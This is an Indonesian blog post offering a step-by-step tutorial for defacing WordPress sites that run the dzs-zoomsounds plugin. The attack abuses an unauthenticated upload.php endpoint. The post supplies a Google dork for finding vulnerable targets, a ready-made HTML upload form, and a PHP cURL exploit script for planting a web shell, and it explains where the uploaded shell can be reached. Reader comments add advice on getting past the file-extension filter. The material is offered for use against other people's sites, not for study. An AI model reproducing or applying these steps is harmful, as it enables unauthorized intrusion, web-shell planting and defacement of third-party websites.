Tuesday, 2 June 2015

Tutorial Deface WordPress dzs-zoomsounds Plugins Remote File Upload Vulnerability & CSRF Upload

xixixhi,, lama gak bikin Thread >.<"
ketemu lagi sama Nuenomaru dengan Tutorial Deface WordPress dzs-zoomsounds Plugins tapi kali ini Nue akan share CSRF Upload nya juga loh :p
yoo langsung aja :

# Vendor : http://digitalzoomstudio.net/docs/wpzoomsounds/
# Author: bl4ck-dz
# Date: 28/05/2015
# Infected File: upload.php
# Category: webapps


Dork: inurl:/wp-content/plugins/dzs-zoomsounds
(kembangin lagi Om dorknya biar dapet banyak vuln and verawan)

Ciri ciri VULN o.O ?
cantik, sholeha , bisa masak , bening , sangar di ranjang ( itu mah ciri2 istri idaman)
wkwkw kek gini om ciri2 vuln: not for direct access




Kalo gak kek gambar diatas, segera move On and go google dork lagi Om >.<"


kalo udah dapet yang vuln , langsung copy Script CSRF Upload dibawah ini
<form
action="https://nuenomaru.co.li/wp-content/plugins/dzs-zoomsounds/admin/upload.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="file_field" ><br>
<input type="submit" name="submit" value="Submit">
</form>
*save dengan .html (contoh.html)
*ganti nuenomaru.co.li menjadi url link target yang baru saja anda dapat

- jika sudah buka file nya tadi.
- klik browse cari file yang mau sobat upload (shell , image , atau script deface)
- klik upload




jika upload file sobat sukses, muncul kek penampakan gambar dibawah:





Shell Access :
http://nuenomaru.co.li/wp-content/plugins/dzs-zoomsounds/admin/upload/sh3ll.phtml


atau langsung upload file script deface agan juga bisa.

cara nya sama kek tadi:




done: file uploaded





nah kali ini upload sh3llnya lewat cmd via XAMPP :v xixixhi
yoo yang suka maen xampp dibaca juga yoo

sama kek tadi juga dork dan apa apa nya lah wkwk

copy script exploitnya :

<?php
$evil="she3ll.phtml";
$ch = curl_init("https://nuenomaru.co.li/wp-content/plugins/dzs-zoomsounds/admin/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('file_field'=>"@$evil"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch); curl_close($ch);
echo "$postResult";
?>
* save dengan .php (contoh.php)
* she3ll.phtml ~> ganti dengan nama shellanda.phtml
https://nuenomaru.co.li/ ~> ganti dengan url link web vuln sobat :p

Jika sudah nyalakan XAMPP ..

buka CMD:

Ketikan:

cd C:/xampp/php
php contoh.php

jika sukses 

shell aksesnya juga sama kek yang tadi ..

xixihi semoga bermanfaat ya om, maaf kalo ada kesalahan dari Nuenomaru yang ganteng ini :*
maaf tutor agak cupu kalo saya yg nulis :'(
Happy CMS Wordpress Deface ya Om



Source and thanks to: Onta Blog


./Nuenomaru

Nuenomaru just an illusion in Cyber World








Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2

4 comments

tutorial deface wordpress ini sangat membantu saya ... nice artikel gan

kok malah muncul invalid extension - disallowed_filetypes
gmna ya solusinya ?

ektensi file yang agan mau upload itu di protec alias gak bisa diupload ke web itu ..
coba ekstensi nya di ubah kak :)

salam sukses kak

_Nuenomaru_

tegkyu gan .. xixixhi ^^
moga sukses selalu

Nuenomaru


EmoticonEmoticon